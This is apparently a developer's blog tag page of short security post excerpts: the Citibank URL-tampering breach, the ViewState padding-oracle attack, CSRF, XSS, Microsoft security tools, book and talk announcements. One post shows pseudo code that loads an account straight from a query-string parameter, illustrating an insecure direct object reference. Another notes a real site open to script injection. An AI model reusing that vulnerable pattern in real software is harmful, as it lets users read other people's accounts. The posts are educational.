security
There are 26 entries for the tag
security
Now my DevSecNerdRage™ has calmed down I thought it might be guess at what went wrong with Citibank and how you, as a developer, can avoid making the same mistake. From reports in the New York Times it appears the attackers had a valid login and password for a Citibank credit card site and once in they changed the account number in the URL. This is a great example of Insecure Direct Object Access. I can imagine the code / configuration doing one thing; (all code in this post is pseudo code)if (IsAuthenticated)
{
LoadAccount(Request.QueryString["accountNumber"]);
}
Its not the first time...
Last month I was rather pleased to welcome Troy Hunt into my little band of Developer Security MVPs. He’s been doing a bunch of blog posts on the OWASP Top 10 list for ASP.NET developers. Check them out, he’s almost finished. Technorati Tags: MVP,Security,OWASP,ASP.NET
So late Friday two security researchers presented a side channel attack on the encryption and validation methods used on viewstate. This attack allows the attacker to derive the machine key used to encrypt viewstate and thus create their own signed viewstate, possibly compromising the web application. Side channel attacks work by analysing the response from the cryptosystem to infer information, in this case using the error responses from invalid padding. Now that the researchers have presented their work is under investigation; MSRC have an official advisory along with further information. ScottGu has also posted more details including a work around...
You can order it from Amazon and it’s in stock. Even better because I had an American editor you’ll find a severe lack of the letter U in words and the abomination that is the Oxford Comma scattered throughout. In other news despite the continuous hobbit comments Alex Mackey, author of Introducing .NET 4.0 with VS2010 (Amazon US / Amazon UK) has reviewed the book and said nice things, all without payment! Technorati Tags: ASP.NET,Security
So by now we should all know that using user input in a web page and spitting it back out again without encoding it is a bad idea and leads to cross site scripting. Of course some web sites don’t bother, which leads to hilarity such as the Toyota Ireland recall page, as demonstrated here. All the HTML encoding in the world won’t save you if you’re not constraining and validating your input … (although Toyota aren’t even bothering with encoding – you can embed script in the r parameter for that page) Technorati Tags: Input,Security,XSS
Last year Wrox switched from having happy, smiling, chin posing authors on their book covers to, well, to random images with a bit of red. So for those of you that have pre-ordered you’ll be happy to know that you won’t have me smiling out from your book shelf. Instead you’ll get an image which encapsulates my interest in exercise and sports. Errr, well, someone’s interest in exercise and sports. Never fear though, I am on the inside … Note for Americans – this image is from a game called football by the rest of the world. The...
So about an hour ago the last edits to the proof went off to the proof reader, which hopefully means, after a year, it’s all done. You may be pleased to learn that, as I’ve taken so long, it will be published using the new, better quality paper and will not have my mug shot on the cover. (When discovering this my smart assed nephew said “That’s good, people won’t judge the book by its cover”.) The final details are as follows: Beginning ASP.NET Security Wrox Press ISBN : 978-0470743652 Pages :...
At the end of the month I’ll be in Dublin delivering “Stop your website being stung” – a guide to the OWASP Top Ten project and how you can secure your ASP.NET site against them at epicenter. There’s a few other MVPs speaking as well including Craig Murphy, the Black Marble boys Richard Fennell and Robert Hogg and that damned Jon “I’m going to answer everything on StackOverflow” Skeet. Two DDD Belfast speakers are reprising their topics, Alex Mackay is giving his standing room only session on VS2010 and Andrea Magnorsky is covering the Monorail MVC package. Tickets are...
Today saw Microsoft release an out of band update for Visual Studio correcting a vulnerability in the Active Template Library. Any control which has been compiled with previous versions of ATL may allow remote code execution and must be recompiled and a corrected version distributed as soon as possible. This vulnerability affects Visual Studio 2003, 2005 and 2008. Microsoft have a dedicated page to the problem on the Microsoft Security site. The Security Research and Defense blog also has an overview of the release along with a great list of further resources: MS09-034: Internet Explorer bulletin ...
AntiXSS, the open source encoding library from the Microsoft Security Tools folks has gone live, and the binaries are available from the MS download centre. I’ve been recommending this for quite a while over the framework’s HttpEncode and UrlEncode simply because it offers more options (JavaScript, VBScript Xml Encoding) and has a visible test suite – plus if something does go wrong it’ll be easier to patch it quickly, rather than wait for a patched version of the .NET framework. There’s also a runtime module which will try to encode on the fly in case you forget to … ...
I gave my OSWAP presentation to Vista Squad last Wednesday, where Ian Smith kindly (?) videoed it. The other speaker for that evening dropped out, meaning the poor attendees had just me to listen to as I stretched it out to about 100 minutes. The length meant that the video is in two halves. Part 1 from Vista Squad on Vimeo. Part 2 from Vista Squad on Vimeo. The presentation is the same one I gave at WebDD so the slides and code are the same. The feedback on twitter was amusing; ...
The UK .NET Community’s favourite redheaded step child Phil Winstanley just emailed me to say I’ve been picked to talk at WebDD. I’ll be presenting “P0wn3d! (Or how to redirect your friend's website to katyperry.com)”. This takes the outings of my OWASP Top Ten Web Vulnerabilities talk to 5 outings over the next couple of months: WebDD09 18 April 2009 DDD Scotland 2 May 2009 VBug London 26 May 2009 DevEvening Woking 4 June 2009 Vista Squad London 17 June...
I was emailed the second draft of the book cover today, which makes it scarily real. But not half as scary as what Oliver did with it. Ah the MVP community – we’re a tight bunch of nits … Technorati Tags: Wrox,Book Cover,Books,ASP.NET,Security,MVP
How may of you practice what you preach? Run as a non-administrative user? Use separate, strong passwords for all your internet accounts? I’ve been guilty of doing neither – I blame Visual Studio for not being able to run as a limited account, but not using strong passwords and individual usernames has been done to laziness and a bad memory. lastpass.com to the rescue. lastpass is a browser plugin and web site that replaces the “Remember username and password” functionality of Firefox and IE, on Windows, Mac and Linux (there’s even alpha support for IE 64-bit). This is nothing...
Following up AntiXSS Mark Curphey also announces the first public release of CAT.NET. CAT.NET is a managed code static analysis tool for finding security vulnerabilities. It's exactly the same tool we use internally to scan all of our Line of Business (LOB) applications; it runs as a Visual Studio plug-in or as a stand-alone application. It was engineered by this group (CISG) and has been designed in partnership with the ACE Team and Microsoft Research. The ACE Team do thousands of code reviews for the internal line of business applications and for our external customers and have provided a...
As part of the book currently under way I cover Cross Site Request Forgery, a rather fun exploit that numerous web sites have been vulnerable to. In September of this year researchers from Princeton announced the discovery of four major web sites where were susceptible which included ING Direct, a vulnerability which would allow an attacker to transfer money between accounts. CSRF works via persistent authentication. When you logon to a web site an authentication cookie is left on your machine (or if you're using HTTP Authentication your browser remembers and sends the username and password with each request). An...
This week is Get Safe Online week; a campaign founded by the Government, HSBC, SOCA and Microsoft. The campaign site, http://www.getsafeonline.org/ is aimed at the "mum" user, people who don't know about the ins and outs of security; the people who are at risk the most. This year they're focusing on identity fraud; apparently research and survey information will be available. As the week progresses more information will appear on the site, written in non-technical language and presented in a way that everyday Internet users can understand. So if you don't want to try to explain phishing...
Last night my twitter feed started filling up with messages about Twitterank; in fact there are so many messages that it's currently in the top 10 trends for the day on tweetscans.com. Looking at the people in my feed who used it; a few MVPs, a bunch of Microsoft staffers and a couple of other technical folks it looked interested. Except, well, I'm paranoid . Twitterank is much like a google PageRank for your twitter accounts. Cool, just what we need, more ways to feel inadequate on the internet. The interesting part of it is...
Well; in a few months anyway. A month or so ago I saw a tweet flit past asking for someone who has ASP.NET security knowledge; someone pointed the user my way. I assumed it was someone just asking for advice, so I sent off something along the lines of "What do you need to know?". It turns out the recipient was part of Wrox Press and he was after knowledge, on the shape of a book. So after some pondering and pointing out I thought it had been done to death we both came up with, what...
Yesterday saw the release of the beta version of the P&P team’s WCF Security guide. The guide, Improving Web Services Security: Scenarios and Implementation Guidance for WCF, is the Microsoft recipe book for Windows Communication Foundation. It aims to show you how to build secure services using WCF and promises to be "a compendium of proven practices, product team recommendations, and insights from the field", including application scenarios and step-by-step how-tos. Best of all it’s free; published as a PDF for download. The chapters are Security Fundamentals for Web Services Threats and Countermeasures...
From page 52 of the new Leopard security guidelines; Enter a new password and verify it when prompted.This password can be up to eight characters.Do not use the capital letter “U” in an Open Firmware password. According to an Apple support doc (if you do kiss booting your machine goodbye; - darn, not the case) If you used Open Firmware Password utility to create a password that contains the capital letter "U", your password will not be recognized during the startup process (when you try to access Startup Manager, for example). Excuse me while I giggle insanely .......
Hot on the heels of the OpenID phishing demonstration comes a proof of concept entitled "On the Insecurity of Microsoft’s Identity Metasystem Cardspace". Setting aside the valid concerns of DNS poisoning the proof of concept makes use of SSL certificates; the proof of concept requires a user to install and trust a new root certificate. The assumption is that a user will blindly do this, I am not so sure; especially as both IE7 and Firefox will throw full screen certificate errors before allowing a browser to proceed. The user would have to choose to proceed, install a new root...
I received the email last night; I’m speaking at DDD again, this time on WCF in a presentation entitled Web Services; we don’t need no stinking web server Remoting is dead. Long live WCF. This session aims to cover the creation of web services with WCF, inside and outside of IIS, including one way and two way services, as well as contracts, faults, authentication, authorisation and security. I think I’ll try to sneak something CardSpace related in there *grin* As an added bonus I’m also sitting on the recruitment round table discussion sharing my personal thoughts on where candidates...
A while back the call went out for a .NET speakers who would come to Ireland; and now the Irish Microsoft Technology Conference has been finally announced by Claire Dillon. Yes, I am speaking, giving my "Hacking Web Sites for Fun & Profit" talk (which doesn't appear to be as trendy as all the other topics, but Dominick Baier beat me to a CardSpace presentation!). I'm not sure this counts as an international engagement for me as I was born north of the border, but it does give me a a birthday cake, as my birthday is the day after and...
You can now vote on sessions you want to see at the next Developer Day. It's rather funny to see an entire Security section manned by my colleague, Chris Seary, and myself, I should have submitted more than one session just to try to catch up with Chris I hope to cover CardSpace, a talk I originally gave at WebDD except this time I won't be up against ScottGu <g> Richard Costall described the session from WebDD thus; I ended up being lured into a talk on CardSpace by Barry Dorrans. His session was described as the Overflow room for Scott's...
Last Thursday saw Chris Seary and myself presenting at the Microsoft offices in sunny (yes, really) Edinburgh for the Scottish Developers Group. Thanks must go to Craig and John for organising. I presented an updated (trendy white on black) "Hacking Websites for Fun & Profit", "Securing ASP.NET Websites and Applications" and "An Introduction to Windows CardSpace". An audience member (sorry, I didn't catch your name) asked me to put together some resource links on SQL Injection, XSS and so on. Probably the best breakdown of SQL Injection is Chris Anley's PDF, "Advanced SQL Injection In SQL Server Applications". The XSS FAQ is...